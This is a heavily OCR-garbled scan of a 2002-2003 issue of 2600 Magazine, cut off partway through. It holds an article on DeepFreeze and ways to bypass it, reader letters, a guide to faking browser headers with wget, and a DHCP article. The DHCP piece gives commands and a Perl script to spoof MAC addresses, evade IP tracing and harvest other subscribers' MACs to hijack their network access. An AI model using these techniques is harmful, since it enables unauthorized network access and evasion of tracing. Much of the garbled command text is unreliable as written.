wk^gaologyb 22 1 5] .vhMjncrfnyyf. ?? 1 15] wh.-unolayy Z 221.7] wk-gealogvd 221 8] w’>: geclogyli 22 1 .&i ■Wolfgang [04 9Q[ wondQllaRd [1.2B[ wurdanarl [40.55] work [76 11] workbench. ecApse [108 65] workpeople 1 1 55 . 1 [ wormy [lisilli] woreSddet |T0? 26] M.vrUhojansc |98 4] Jtylold [9&.5] ydDhlrope [40. 1 B5] yankeechppej 1 4ft. 189] yankees [33 1 b] yiivln.nrnplru ac1|p*fi (102.137) yoLm gened 1 40.05] yourbreodrib [00.39] yOurbrendS? [&0 07] varri nr [15.1&3] zanyclawn lytho ]J. SDO) ;,irnmzei-i [64.18^| znranlzei lOQ |64 iftO] jar*nlzi!J 50 [&4 178| Zfr fflnlZftil 77 [64 . 1 77 1 zaranTzei178 [54.1 78[ rnranizei2 F5 [64.218] fannbatS 18 [84 .21 8] zappos [6S 42) zprpdTifr J4ft IBS] rkm [1 ’i| dpbuy ]5 9] rlpfwrBn* [109 90] jEOWfr |15 08] srbflfttlff |16,1] zWrtjn [139-.74] -mm [15.fl7| ZUUl [15-65) jrygema [15 70] H inter 2002-2003 Page 45 by The Ratline WiLh the past few issues. I’ve noticed a few queries about a program called DeepFreeze. Be- ing someone who works with it on a day to day basis, I thought 1 might clear up a few murky ar- eas and discuss some of its features/drawbacks to help illuminate both users and admins who might be using this software, DeepFreeze is a program made by Hyper Technologies (ww wdeeplTeezeusa.com) for Windows platforms, and is designed to be a de- terrent to "hackers" (quoting the website here), virus solution, and maintenance tool. Essen- tially, what the program does is lake an image of your hard drive on installation and "freeze" the system, making any changes to the system after bootup temporary, I have been hard pressed to find something DeepFreeze couldn't undo al ter taking basic precautions (more on those later). Formatted drives are back on reboot, programs installed over a freeze are gone, a virus can even infect the system, and on a restart, it will be gone. However, the computer isn't permanently frozen. The program can be uninstalled of course, once the computer itself is thawed," but DeepFreeze can also temporarily disable it- self for a time so that one may make changes as needed. li quickly becomes apparent that it is vita! on installation of DeepFreeze to have everything perfect on your computer before freezing it. Disabling Deepf reeze can be a pain in the ass and time consuming, so geiLing a good, clean, working install right out the gate is vital. Obviously, for an open lab/school envi- ronment, DeepFreeze is incredibly useful in keeping computers running with relatively few problems. Unfortunately, I haven't taken a peek under the hood as it were to see just how Deep- Freeze does what it does, but my bosses and I would be very interested if someone out there would take a look and get back to us on the mechanics of the program. DeepFreeze currently has three major ver- sions that 1 am aware of and have had experi- ence with, two of which are outdated. The first is a standalone install, usable only in a Win- dow s 95/98 e n v i ron me n l . Th i s ve rs i o n is d t Her- ein from other versions in that it is the only one to have the disabling process before windows starts up. Watch the computer boot up. The w in- dows splash screen should pop up for a moment before going to a black screen, and in the upper left-hand corner of the screen you should see five dots appear, one second apart from each other. This is your opportunity to hit Ctrl-FH to access a password prompt. After entering the password, you have numbered options available to you in a text screen, which you access by hit- ting the number. You can continue booting the computer, boot the computer thawed, or change the password. These are all pretty self-explana- tory. Note that this version has a few haws in it. You can Ctrl -Break during hootup, either to mess with how Windows starts up. or even in theory to prevent DeepFreeze from starting. (1 haven't tried this yet; we migrated away from this version pretty quickly.) Next, you have to thaw the computer on every reboot, so once the machine is thawed, you can keep it thawed by doing a soft-reboot in window s (left shift as you click okay to restart on the shutdown menu). Double-clicking on the frozen icon in your task tray displays ASCII text as was mentioned in an article. This is text used for One Time Password (OTP) generation. Basically, this version allows you to call up Hyper Technologies and give them this code, and they reply w ith a password that is usable on that machine once. You can then reboot, use the OTP, and reset your pass- word, Obviously, a little social engineering is all that's needed to defeat this. Hyper Technolo- gies must have realized this, because it doesn’t use this system anymore. The next two versions of DeepFreeze come in two different flavors. The first is Standard, which retains the stand-alone method of instal- lation of the old version and needs configuration on each computer. The second flavor is the Pro version, which comes as a console package, then creates individual, tailored. The two re- lease versions more or less are identical, the only difference being that one supports Win- dows through Win2Q0G, and the most recent also supports XP. The console is kind of nifty. On install, it asks you for a siring to make the console unique, so that one console won't affect every install of DeepFreeze out there. After that, it gives you the ability to create diskette-sized in stall packages for your computers. By default, there is no set password, nor is there the ability to set a password. Default settings use only the < )ne Time Password option, relocated from Hy- per Technologies to the console However, if you want to have a static password, you have i he option of setting up to live and the option to change any ol those five passwords. You also have the option to freeze individual drives or all drives to schedule "maintenance lime" (times of day where the computer reboots and is automat- ically thawed for a set period of time), an idle reboot timer (after x number of minutes of no key boa rd/mouse activity, the computer reboots and refreshes itself in the process), the opportu- nity to create a "ThawSpaccU which is basically a mini-file given a drive letter that isn't frozen by DeepFreeze, and the ability to lock out ac- cess to the dock/calendar, and disable the Ctrl- Break function at bootup. After all this is done, \ou save the configuration, create a setup file, and zap it to your diskette. You can also disable I He freeze icon in the system tray, forcing the user to use the keystroke combination of Ctrl- \ll Shift-F6 to get to the password prompt. On the computer side, the computer now boots up frozen. If you hold down Alt-Shift and double-click the freeze icon (or use the above keystroke combination), a window will pop up prompting you for a password. At the top of the itidow, you can see your OTP token to gel a p is sword from the console, as well as the ver- lon number. The latest one I’m aware of is ■ imewhere around V4.20, Enter the password 1 1 id you get three radio button options with the "iv labeled "status on next boot. The options ,ne "boot frozen. " "boot thawed for X reboots" X is configurable), and 'boot thawed" t until oil say otherwise). Also, it appears that the lat- est version will automatically allow the updat- ii of daylight savings, without having to thaw M computer to change it. Perhaps this is the reason Why DeepFreeze wilf block access to the lock now. Uninstallation for all three versions involves thawing DeepFreeze. With the first two versions "U van then go to the control panel and ad d/re - move programs and remove it that way. The most recent version now requires that you run the setup file from your install disk with Deep- v/e thawed for the option to uninstall, so >n't loss the install disks after you're done with i hem, I here are still sonic issues with DeepFreeze 1 1 I doubt can be avoided through program- ming. First, naturally, is the observation that hooting to a floppy will prevent DeepFreeze in starting. Any admin worth his weight will in off boot from floppy and password the BIDS to prevent tampering as is. Second. Sys- m Restore in Windows XP has the ability to uninstall Deep Freeze, even while it's on and frozen, by simply restoring the computer to a point before when DeepFreeze is installed! It basically docs to DeepFreeze what DeepFreeze does to the rest of the computer. Any sysadmin should disable System Restore in such a public setting as would justify DeepFreeze I mni being used. With those two precautions in effect, it be- comes very difficult to get around DeepFreeze. With the implementation of a central, unique console, security involving the OTP is a little better (admins have control over it now at least). Finally one note on the usage of DeepFreeze on NT based machines. For some reason, Deep- Freeze seems to be dependent on the SID. In an environment that uses image-casting software to deploy images to multiple computers, Deep- Freeze screws up royally after running SysPrep or refreshing the SID, usually requiring a for- mat to fix the problem, it’s important to pull it oft before refreshing the SID, and then put it back on. Speaking of imaging, one weird quirk with Symantec Ghost and DeepFreeze is that occasionally, w hen performing a hard resei on a computer or rebooting after the computer has reached the it is now sale to shut down your computer" screen, it will prompt you with a screen saying "Operating System not found." It's a minor annoyance, as a reboot fixes the problem, and it's rather rare. 1 actually keep a copy of DeepFreeze around for my home computer. Why'.’ ft makes a great sandbox to play around in. 1 can do anything 1 want and screw up my system as much as possi- ble, and the fix is only a reboot away. Anyone wanting to foot around on a computer with DeepFreeze on it can do so without worrying about messing up the software. You can even power off or reset the computer without the proper shutdown procedure, DeepFreeze doesn’t care if Windows shut down improperly - it restores it to a nice state anyway. Hopefully you've gained a little hit better un- derstanding of this program. It’s becoming more widely used in the world, and understanding its strengths and weaknesses helps the curious bcl- Lcr use or appreciate the program. It's also a great example of how a strong piece of software can be bypassed due to the ignorance of an administrator. Page 46 2600 Magazine Uniter 2002-2003 Page 47 I continued from page 39 Dear 2600: ! have found on several ATM's that all ten mini tier keys have distinct tones and can easily be told apart. This is the dumbest thing an ATM manufacturer can do T as anyone with a good grasp of tones can easily get someone elxe's PIN without watching or very eas- ily record this, take it home, and analyze it with standard audio software. Mark the very least, it can he used to impress fund frighten ) friends as they shield the keyboard from your prying eyes. Dear 2600: You printed a letter in 19:2 regarding google re- moving a site from their directory due to a DMCA vi- olation which was tiled on behalf of the Scientologists. I tend to gel a chuckle out of the Sci- entologists so 1 figured I'd see what the violation was. At first i found mostly boiler plate stuff (pictures and documents) until I scrolled down to the end. Under "Federally Registered Trademarks'' wc find an L. Ron Huhhard signature which is registered w ith the United Slates Patent and Trademark Of! ice under registration number 1,821,751. Now let me get this straight. This idiot actually went and trademarked his signature? Wow, 1 wonder what happens when he signs for a Fed-Ex package. The MbbliT (t probably causes quite a commotion. Dear 2600: Late one Tuesday night 1 came to a realization. As I finished a box of Cheezdts, 1 realized 1 hat if one halved the box at an angle, it makes two perfect hold- ers for one's issues of 26001 Sadly, I only had enough issues to fill one, but l trust l r Il fill the other. Spooky Chris Perhaps we re witnessing the birth of a new p breaker box - The Cheez Box (not to he confused with the original Cheese Box of days past). Dear 2600: While I was at FOXs web site ftying to find out when I might he able to buy episodes of Family Guy, I ran across this gem; ,r & Can I get tapes of FOX Network Primetime Shows sent to me? "ANSWER: The FOX Network does not provide nor sell videos of tiny of shows hie f. specials or movies (hat air on the Network. "Our recommendation is to ask co-workers, friends, family and neighbors for anyone who may have taped off-the-air the show you are looking for . ” Now correct me if I’m wrong but wouldn't that be stealing or some son of copyright infringement? Sar- casm fully intended. It sickens me to realize that this was nay first thought when I read this. Look at what corporate America is doing to people. Down with corporate rule! You guys do a fantastic job. Keep up the great work. jessc Let 4 just hope this common sense approach becomes more of a standard. Dear 2600: I think Jack Valenti is a great man doing great things. The hacker community will soon be behind him. Christopher It s the logical place to he if we're about to overtake him. Dear 2600: [ just received a shareholder report from one of the funds in which my 401k is invested. I usually throw the report out or file it away without reading it. After reading my earnings statement and finding that the value of my 401k had dropped by 20 percent, I thought maybe the report could give me a due as to why this had happened. It cited various reasons al- ready covered by (he media, but this was my favorite and i thought you might like to read this: "And Now for the Bod Ne vv.s.. . The popular passion to punish the corporate culprits is likely to achieve wily modest satisfaction. Fraud was rare and is hard to prove in court, la-gal hut bad behavior carries tittle cost to the perpetrator. The U S, does not have the strong 'culture of shame ' which effectively regulates executive behavior in Japan. We have no compulsion for ritual apology i to say nothing of ritual suicide) in this country. Many of the executives who lost a fortune for the shareholders who trusted them simply will sail off into retirement on their yachts . " This report came from the Clipper Fund. It has a web site at www.dipperfund.com. This report may not have much of an impact hut hopefully it may open the eyes and ears of those who refuse to listen to the same information just because it came from a hacker magazine. Thanks 2600. justiiiburh Dear 2600: l just literally stumbled on this while researching something. Go to www.singtr.com, click on (he "in- tranet' 1 button at the bottom of the screen. Enter "guest 11 as both username and password, Voita! You Ve- in (he Singer Company's intranet. jmk Or so they say. There doesn't seem to be a whole lot you can do as ‘ guest. " Dear 2600: I just got done reading 19:3. In the letters section echo! on talks about White House numbers like 3 U 436-9431. I called it out of curiosity. The guy ui tin- phone answered "Situation Room," I asked what they do (here and he struck up a conversation about siinu in the Rocky Mountains. Then lie slipped and said lie was in the White House, f called again later tonighi and a guy answered and asked for my name anil phone number Of course l gave him false info (not like he couldn't have gotten it anyway), i as keel (In guy again what they do there and he pin me on hold ,i sec and said they were a pri vate federal government agency and (hey take care of security matters. 1 spoL to a close friend who is ex -Air Force Intelligence. He told me that is where the top military officials hold conferences on top military matters and that I should Page 48 2600 Magazine noi have that telephone number. Thai is die same 1 1 >om where they held the talks about the Cuban mis- mIc crisis. Well, hope this enlightens, Radarjam We admittedly don 't know a whole lot about what goes on in that place. But common sense would dic- tate that repeatedly calling the equivalent of an inter- na! crisis center in an increasingly paranoid and powerful government may result in some kind of back- lash, Of course, the ease with which such information < an he found makes one wonder how serious they are about keeping it secret in the first place . Dear 2600: I just picked up 19:3 and read your response to echelon's Idler noting a phone number for a "situation room.' When I Lried your RDF URL 1 got a 404, so 1 [bought I'd lei you know where I eventually found the i nfo: fmp://www,fema,gov/emanagers/ecd Joc.shtm . FFMA doesn't advertise this kinda stuff, but a search lor "contact" produced it easily. sunzi Dear 2600: This was published in The Economist of October ’ft Countries were ranked according to press free dim i , The top five were Finland. Iceland, the Nether- , i n mind. I was driving home from work and heard something on the radio where a local business w as having a to-do of some kind to honor the fallen firefighters from 9/11. (They made no mention of the police that died that day, } Next to me in the passenger seal was my crisp new copy of 2600 dial I haven't even finished reading yet and it dawned on me: hackers and cops arc a lot alike in some regards. You sec. I r m a cop. And an avid reader of 2600. And a want-lobe hacker. I just don l have the time right now to devote to Seaming how to program and I refuse to be a grown up script kiddie. But l digress. How arc we alike, you ask? Hackers, the real ones, work hard at becoming good at some- thing and most desire only recognition for achieve- ments and take pleasure in discovering security holes and learning how to fix them (only to name a couple things}. The hacker community constantly has to deal with a host of morons who pretend and claim to be hackers but instead give everyone else a bad name. Ami us cops? We. too, bust our asses to do our jobs, get little recognition for it, and the ones who stick their head up their own asses and do something dumb attract the whole country's attention and we, too. be- come public enemy number one, ITie big difference? People smile and play nice when I'm around... a hacker walks through his high school wearing a Free Kevin shirt and gets expelled. Oh yeah, why would a cop want to learn how to hack? Someday I hope to work for the Feds hunting down those who would vic- timize children through kiddie porn. 1 consider that, besides drugs, one of the most important things the government can focus on. -So hack on! And keep putting out this kick ass mag knowing that there's at least one of tne out there on your side, Sparkster A New Project Dear 2600 : Do you expect a DVD version of Freedom Downtime to he av ailable for the holiday season? Poetics Yes. wt do. hm not for the holiday season that just passed. In fact we hope to have the DVD finished well before the next one. This project is dependent entirely an how much time we can allocate to if as well os him much money we can raise through video sales. We ex peel to add quite a few features and additional footage , as well as other things. We're still open to suggestion on this. Dear 2600 : I'll he more than happy to translate Freedom Downtime into Italian when you gel the DVD out ElfQrin As this is our latest project, we're iti the process of getting a hunch of translations done as soon as possi- Page 50 2600 Magazine If you have suggestions or want to help out email ns at do wfitime fe- 2600. i r mi. Critique Dear 2600 : I must voice my objection to the "angle'' 2600 H unk on its coverage of Sherman Austin's indictment. I have always placed strong faith in 2600 and its posi- tion of supporting free speech. However the way in a hieh your online article was worded reminded me of tlu tactics national news coverage often use to depict I lackers, "It is not clear why Austin is being targeted; more detailed and potentially destructive bomb-mak- mg information is readily available ai public libraries "i on Amazon.com." It, to me at least, is very obvious hat 1 he reason why Sherman Austin is being targeted because l he man has upside down and burning Xmerican Hags on his web site (www. raise- ihelist.com). Make an outcry lor the man's right of n e speech, cite the government's Gestapo- like tae- i . hut for pete's sake don't martyr a man because he li tes some of your ideas at the expense ol journal is- iu integrity, 1 admit some of Austin's ideas are appeal- m but right-wing- ism (making bombs, stickers illing us lo arms, blatant disregard for the way others lit uk) is not the 2600 that I have come to know. If it then I for one fed that 2600 and I must go our ■ pur ate ways. AGEJ8 You may have already begun that journey. We ■ jin / hy the story { which only appeared an our weh- oml not in these pages] as on example of how meant with unpopular views con he i ndi scrim i- i nets targeted for prosecution while of her more tiuii n stream outlets of the same views remain ttn- '« fed. How you see us making a martyr of him is to- ri' hexond us. And if van truly believe that only the •ht wing believes in the things you cite, we suggest .-ding some history or simply getting out a hit more. I *ar 2600 : Perception is reality. The perception tin the real 'ild) is i hat all hackers arc had , So it's the reality, i d i hat s Llia l . I know you guys and ihe readers of lee magazine think and know otherwise hut what the il world perceives is reality. Gel over it! There w ill : r he good hackers, C an you imagine a World War ll veteran believing 1 1 1 there were good Nazis? C an you imagine an early < m settler believing that there were good Endi- < Fin you imagine a southern redneck believing llllil there are good N....? No way. No one but the hIlts of this magazine (who are so paranoid that 92 cm of them buy it off the rack ) will ever believe ih.it there are good hackers. No amount of money or •motion or ranting will change that t hi lop of that you title your magazine "26002' Do ii really know what 2600 is? Lei me lell you what il in the real world. It's a four digit number that stands ■ live letter word: fraud. Nobody who built a blue ■. w glee ftv Ily calls t hemse I ves a " pi tone phreak " i s interested in privacy or security or any of the artful dodges used to describe good hackers. They were anil are interested in screwing Ma Bell. In a word* stealing. It r s ludicrous, Then inside the magazine there are lovely articles about how so cheat Blockbuster, say naughty words on the scoreboard during a football game fnoi really but if you couldn't read that between the tines get an imagination), a lovely personal ad for a guy who wants to break into homes through garage doors when he gets out of prison, another from a prisoner who is a virus writer wanting help to become an expert in his chosen hackers kills, and a third that can only be de- scribed as pornographic. Do you guys have editors? Do you have editorial standards? I know you live on Long Island, but please! If your magazine is for good hackers, presumably those with nothing to fear from the law, then why are the vast majority of articles and letters uulhored/signed hy persons using pseudonyms? May I answer? Your magazine, as currently published, can easily be slmwn to be a thinly disguised manual for criminals. You have every righi to publish ii and to rant and rave that you're really the good guys. In ain- tain that an objective (and probably even computer ig- norant) reviewer would conclude ihai you're delusional at best As a computet knowledgeable per- son who has been on this planet for just less than 0x40 years 1 applaud your defense of free speech, fair use, and f'lhcr freedoms. I abhor your wink and nod approach to criminal activity. Well, it's not fair to criticize without offering an alternative so here it is. Instead of hackers (who are bad and acknowledged as bad) and 2600. change the title of your group and the name of your magazine to Sweepers. 1 ' Like ali else ihese days, it's an acronym. System Weakness Exploration Explanation (not Ex- ploitation!) Publication Ethical Remediation Standards, Thai s what "good" hackers do. They explore sys- tems with the principal intent lo leant. When (if) they find a weakness they explain it and, in a responsible way, publicize it and hopefully publicize workarounds (remediation). AH of ihis is done in an ethical way following published standards with no in- tent for monetary gain (intellectual gain is line, indeed the main motivation). Standards for publication hy a Sweeper should include letting the author know first. Wider publication should be done only if the author Jails to respond and only if a suitable workaround is published at the same time. Absent a suitable workaround and author response, the publication should be limited to 'there's a problem with product x and the author won't deal with it." not what the prob- lem is or how lo trash Lhe system and show the author just how smart and powerful we are! Letting the world know that independent, better-t ha n -average beta testers (our word is sweepers) have discovered a significant problem w ill, in most cases, sufficiently af- fect sales and the author will gel the message very quickly. Winter 2002-2003 Page 51 These standards can he easily adapted to editorial standards as well, although the magazine might get thinner for a while. Dave D. After taking a vote, we've decided to take offense hi being compared W Nads. We’re going to let the Long ! stand remark slide. That aside* you raise some interesting points- But you also claim to know, among other things, how the whole world perceives a partic- ular group of people, what's going through our heads, as well as the intentions of every one who writes in to While some of the worst element that you describe does in fact exist, to say that it is the norm and that we encourage this kind of thing is unfair and highly inac- curate. You clearly don’t know the History and you can run know what people get out of the articles they read and write in our pages. The only advice we can offer is that you stop assuming that every one thinks like you. Best of luck in the sweeper world. Significant Developments Dear 2600 : Well I don't know it you care but I am in the group 2600 for seti Thorne and ironically, I just hit 2600 re- sults sent l Just wanted to let ya know, not that you probably care! RusH Of course vte care. Although we’re quite disap- pointed that this magic number didn / result in a dis- covery. This is one of the most worthwhile projects we re aware of and for those who want to get involved and learn a whole lot more about it , go to http iff se- tia thorn e. ssl. be rkelcy. edu . Dear 2600: According to can article at newscientist.com, in the year 26(X) an asteroid that orbits the sun along ihe same path as the Earth will in fact orbit the Earth for 50 years as a second moon. Amazing.., even the heavens and ihc earth are controlled by 2600. fstratto Incidentally, we're planning on rusting our sub- scription price in half for the entire year of 2600 as a special promotion. Stay tufted for more details. Defining Hackers Dear 2600: ] am no important sports star, l am not the lead ac- tor in the school play, nor the highly grungieal youth who pedals the hallways in search of some untimely demise I am me. I am here for who l am. not a fol- lower of a gsoup nor a piece of a puzzle. Lei me in- stead be considered the shepherd to a flock of sheep. But that flock weights so heavily on the judgmental aspects of society. You see. ihis flock and I are those that long for what is never achieved, strive for what is never gained, hope for the light at the end of the tun- nel ihai is too long to walk, too strenuous to master. We are those unlike others. We may no t tit society's mold of the conventional norm," we may not walk Hie guidelines to call us average. But then again, who would want to he average? A fact once stated* "One out of every 250,000 people has a brief moment of glory, one out of every 500 j>eopte will he remem- bered within 10 years of their glory, but only one man will ever he remembered as the man that dare break the boundaries and rules," This is whal we do. We are lhal one person, us as a flock, a whole. Groups slow ly fade. Fashions slowly die out. We are unlike any other Pul us in a host and we will scale the walls to free ourselves. We do not crumble, nor cry. nor sepa- rate. We ore brothers and we are sisters. Hath not the fury of ten thousand burning suns to meh us, nor ten thousand blows of the heaviest hammer to break us. We are Hackers and we are Phreakers. Fh34r us now, but do not expect the feeling to be mutual. fflx deacon It's moments like these when it becomes clear that we could start a cult and probably get away with all kinds of things. But seriously, let s not lose touch with our hitman origins. Reaching Out Dear 2600: Greetings. I've been reading your magazine for a few years now, glancing at the website on various oc- casions as curiosity demanded. I currently live in one of the larger cities in Alabama and through my day job became familiar with one of the men running lor Sen- ator here in the slate. He approached me seeking in- formation about maintaining an internet broadcasting system (In fact, a few meetings wem by without me being aware that he was in the running). This panic u- lai person seemed at leas L somewhat familiar with the computer world although his lack of experience and know ledge hud me worried for a little while in regards to the laws recently passed dial affect net broadcast ers, 1 brought this to his attention and even loaned him a few of my 2600 issues in hopes that he'd gel a belter idea of what he was in for. Days went by and he came hack to me with my books, full of questions which I did my best to answer and a lot more determined to do whal he could in order to affect changes within his scope in the Senate race. Sadly though, he didn't win. This however hasn't changed his views (which were recently broadened by 2600 I might add). I guess this goes to show that while corruption may in fact he a l over the U.S, and other parts of the world, there arc those people who do want to make a change and who do nvT/u a better life for not only themselves but their children and beyond. It may not seem tike there is much point to this let- ter but 1 1 lias been quite a change of pace compared to the normal routine I run into that all "hackers are evil and thieves, etc... blah hi ah blah. It has also shown me personally that there are people trying to get into posi- tions in order to affect changes that would nol only benefit certain communities, but attempt to unt" some of the wrong decisions made before them. Nygfafl We’re going to need a whole bunch of these peo- ple, We re grateful for your efforts in planting some seeds. Page 52 2600 Magazine BEATING DOWNLOAD t MANAGER PROTECTION by Straightface si raightfacegangsta @excite*com While searching for interesting hies on Lhe net you may encounter a file that has been "Download Manager Blocked," meaning that you must use a browser to get the file. If you a l tempt to download the file with a download manager, you will receive a iovely text mes- ige in place of the file you desired informing \ou of your "mistake, " Some may feel de- feated, but with a little slight of hand you can use a download manager to retrieve the file. The initial question we have to ask our- Ives is "how in ihe world does the server know whether ihe program making the down- load request is a browser or not?!?" The an- wer can be found by analyzing the HTTP headers ihe browse: sends in its request for the file. The server attempts to protect itself from low n load managers by checking for particular HTTP headers. Usually it checks the "User \gent M header and can also check for a cookie 'i referring page header. First we must fill our tool box with the proper tools. We will need a packet sniffer to learn how the browser is communicating with lie server. Sniffit is a nice one for Linux. If us- ing Windows, Win Dump works well. Be i ware (he WinPcap libraries are needed for "A in Dump to work properly and can be found hi the Win Dump web site. 1 also employ the Windows program Dice to read the raw files Win Dump creates, Wc are also going to need a nice customizable dow nload manager, f or this 1 choose wget. it is available for both Linux md Windows, free, and has a very small footprint. Once we have all the lools ready we can begin to collect ihe proper HTTP headers, mart up the browser of your choice and bring n to the web page with the link of the file you ' uni to download. Make sure you have your ■ iokies enabled on the browser Now it is time lo stall up our packet sniffer Make sure you ire sniffing the right interface. In this example ihe interlace is pppO. Win Dump requires you to lirst run it with the -D option for a list of in- terfaces and then you must choose the proper one. See the documentation lor full details. Using sniffit: sniffit -t @ -F pppO Using wind amp: windump -w ouipui.cup i t Now we are all set to capture the he idei v Go back to your browser and click on the proper link for the file. Choose a place fm it to reside and start the download. Let ihe life download a few kilobytes, then stop it. Now lefs look at the packets we captured. Sniffit will leave behind some hies whih names liU 11 65 .23 .29.34,3 3265 - 208 .4 8 ,67 . 24 . 80 " which you can view with your favorite text editor. When using WinDump, opening the output file with Dice will give you a list of all the packets you caught. The packets of interest arc usually the first few leaving your machine. You can tell it is leaving as the first IP address' pon number is pretty large, such as in the ex- ample file name above. Find the HTTP request the browser sent. U will look something like this: GET /myDLmanage rblockedfil e.avi H TTP/1 . 0 Con nection: Keep -A / / ve User-Agent: Mozilla/4. 7H [enj (Linux 2.4.8 i686) Host: nodlme.com Accept: image/ gif image/jpeg, imagefpjpeg, image/png, */* A crept- Encod ing : gzi p A ecept-Language : en Accept- Charset: iso-8859- L * uif-8 Cookie: J908dkl=9S R efe rer: h Up YA v ww. n odltne. com/) ddeo5. h In 1 1 Ah ha! There are some odd \ FFTP headers in the request. The two lines we ward to pay attention to are the "Referer" and "Cookie" lines. We also need to include the "User Agent" header in our download manager's re- quest. Now we know how to emulate the browser! Finally, lets set wget to retrieve the file. The wget command using the above captured packets will look like this: wget - u ser-age n t= r M ozi 1 1 a/4, 7 8 [en i (Linux 2.4.8 1686)' \ ”header= r Cookie: f908dkl=93 r \ —he ade r^ 1 Re ferer : Winter 2002-2003 Page 53 h t ip ;// w w w . n od 1 me . co 1 1 1 / v i deo5 , h i m 1 ' \ http: // w w w, do w j \ I oad me . co m 1 m y D L m an agerblockedfilc.avji The file should begin to download prop- erly. If it gives you the "No Download Man- agers" message you might have missed another abnormal HTTP header. You can sniff the browser's request for the file and then mill wget's request and see how they differ to find your missing header. Simply include the miss- ing header in your wget command with the — header option. For serious downloading, wget has options to download a list of files, hut I usually just set up a bunch of wget commands in a batch hie. Have fun with your knowledge of packet sniffing and HTTP headers! They are great tools for your own personal toolbox.... URLs Used Dice: h up :// w w w.n gt ho m as. co.uk/dicchtni Sn ifflt : h up :// rept i I e . rug ,ae , lie/— c oder/ sni ffi t/sn iffil hut i 1 wget f Linux): hnp://w wgnu.org/so ftw are/wget/wget.htm) wget ( Win32): http://space.tin , i t/computer/hherol d/ WinDump : h tl p :// w i nd u m p. po! i to. it/ by diOnysus Did you ever wonder when you turn on your computer to surf the web how the heck your computer knows what IP to use? II you are read- ing this article, chances are you already know. For those who don't know-, I will give you a lit- tle background before revealing how this magic can he used for good,,, err.,, evil... well... you can choose exactly how you use your newfound knowledge. This magical union between your computer and your ISP s server is known as PI I CP i Dynamic Host Configuration Protocol). When you turn on your computer, or anytime you request it to. it sends a request via UDP on port 67 or 68 asking for information on how it should configure the network interface. Infor- mation like what DNS server to use, what IP and netmask to use. DHCP w as created by the Dynamic Host Configuration Working Group of the Internet Engineering Task Force (wow. that was a mouthful). In this article 1 will concen- trate more on how it works than where it came from. We will leave its origins for a more boring article another time. I will also explain how to bend it to your will,,.. Why Should I Care About DHCP? One of the first lessons every aspiring script kiddy learns is the importance of his IP. Your IP is what identifies you to the rest of the Internet. When you spew packets from your computer, this magic number is recorded all over the place, like footprints in the snow saving "1 was here." The only people who can quickly trace this number to your actual computer are your service providers. Coincidentally they are also the ones handing out the IPs (insert sarcasm here) So what if you could have 30 different IPs in an hour/ That would sure make tracing you a lot harder. Easy, right? Just request a new IP from the magical DHCP server and rejoice. I wish it were that simple. When you get an IP from the DHCP server it assigns you a lease. This lease is the amount of time that it will give you the same IP. Also, some ISPs, like my local ISP, require you to register your MAC address with them or their DHCP server will never give you an IP in the first place. The MAC address (Media Access Control) is the unique hardware address given to your network card by its manu- facturer. This gives them an extra level of "seeu rity.' 1 Security is in quotes because I will demonstrate how to fool the DHCP server into thinking you are someone else. Lastly, you have a cache on your end that also says what IP you had last time you hooked up with the DHCP server. If your lease is still good the server w ill try to give you the same address again. This is nice if you have a domain name registered lo u home account, but not so nice if you want to do some port scanning. You would never do anything like that, right? Get To The Good Stuff Already! So now we know a little about how DHCP w orks. Let's get into how h can be useful, t lib article assumes that you arc using a Linux box a s a fi re wa 1 1 / rt >u le r I i >r in te rna 1 W i n dow s boxes 1 will also assume that you have installed the Cygwin package from Redllat on your Win- dows box. 11 you have not installed Cygwin you should really check it out. It gives you much Page 54 2600 Magazine ' nt\ like functionality on your Windows box. ’»l the least of which is perl, which we will be mg later. Cygwin is free at http://sources.red- il,com/cygwin/. Hie Non- Authenticating DHCP Server This could also be called Lhe "easy to fool J J l ICP server/' simply because it will hand out >ii IP to any old MAC address. As mentioned, our MAC address is wTiaf the DHCP server uses to keep track of who's who. Unlike lhe au- thenticating DHCP server, we will not need to » Horm any real magic to get a new IP. For the si of the article I will assume that we lire using 1 1 id I or our external interface on our Linux box. , let's do some initial checking. Fo find our M AC address w r e can simply do an 'ifeonfig na ihO'. Or. if we really warn to feel like Unix As we can use: i Icon fig -a ethO j head - 1 ( cut ! I I -cl This command will become useful l iter when you write a script lo automate the new IP process, right? We also need to lake a look at our DHCP cache. Lets do an Is tc/dhcpc'. You will likely see the following i des: dhcpcd-ethO. cache, dhc pcdethO. info, and Ihepcd-ethO.info.old. We can safely remove these files with an 'nn flf /etc/dhcpc/dhcpc^ethO*' iveause we don't want the DHCP server to 1 now that we ever had an IP. The next thing we need to do is "change 11 the MAC address that ill be sent to the server. First, make a note of mr MAC address. It will be something like fM);50:DA:OA:24:26. Let's change it to dO:50:DA:GA:24:27 and try to get a new IP, First we need to take down the interface with an ifeonfig ethO down' and then we can change Lhe f \C address with an 'ifeonfig ethO hw ether dd:50:DA:0A: 24:27', Now we bring the inter- I ice back up with 'ifeonfig ethO up' and Iasi but not least we request our new' IP with /shin/ifup ■ihO' and voila! You have a new IP, If you got the same IP you had before, you probably forgot to delete lhe cache in /etc/dhepe. At this point it hould be painfully clear how these concepts i on Id he incorporated into a script for things hke port scanning or whatever your devious mind desires. The Authenticating DHCP Server I his is where h gets a little tricky. Some l Ps Hike my TSP) require you to register your l \C address so they can control which com- puters have access to their network So, what's a hov to do? Grab a list of IPs and MAC addresses, wait lor an IP- MAC address to go dow'n, and use that MAC to fool the DHCP server into thinking that you are someone else. Easy, right ' Tin hard pun is how r we get the MAC addresses Lik kil\ i crosoft has provided us with an easy \\u\ ti query MAC addresses from remote . omput \ Netbios strikes again! First we need to gene uh a list of IPs of computers that are on our II our IP is 24.64.220.20 then w e e.in be pr 1 sure that all of the people on Mo I ' ! i. . registered MAC addresses. In i ■, . w i Ildi ■ i NMAP scan on port 139 (netbios porn subnet and generate a list of IPs to qrn \\ lor MAC addresses. nmap -sS -p i 39 -oM 24,64, 23 L M ' f i ] open | cut -d 11 " -f 2 ] ipjisi' will genciMU om list. This should work on Linux and Window (if you have installed Cygwin and NM Alb Then we need to get MAC addresses for all oi the IPs, This can get a little ugly when you have to do it manually. On our Windows box the command 'n bis tat fi A [IP Address] 1 will give us the MAC' address of the remote host as well as some other useless info. Here is a little script to generate an IP- MAC table. Wc will need to do a 'cat ip list | pert this script' on our Windoze box. while ([]) [ chomp ; $ip=$_ ; chomp {$mac_raw= v n btstat - A S_ j grep MAC) ; ( unde l/unde f,undef,$mac)=spl it ( ' .$mac_raw) ; print "$ip $macW* ; 1 Redirect the output to a file and wail a few minutes. Then ran the script again and see 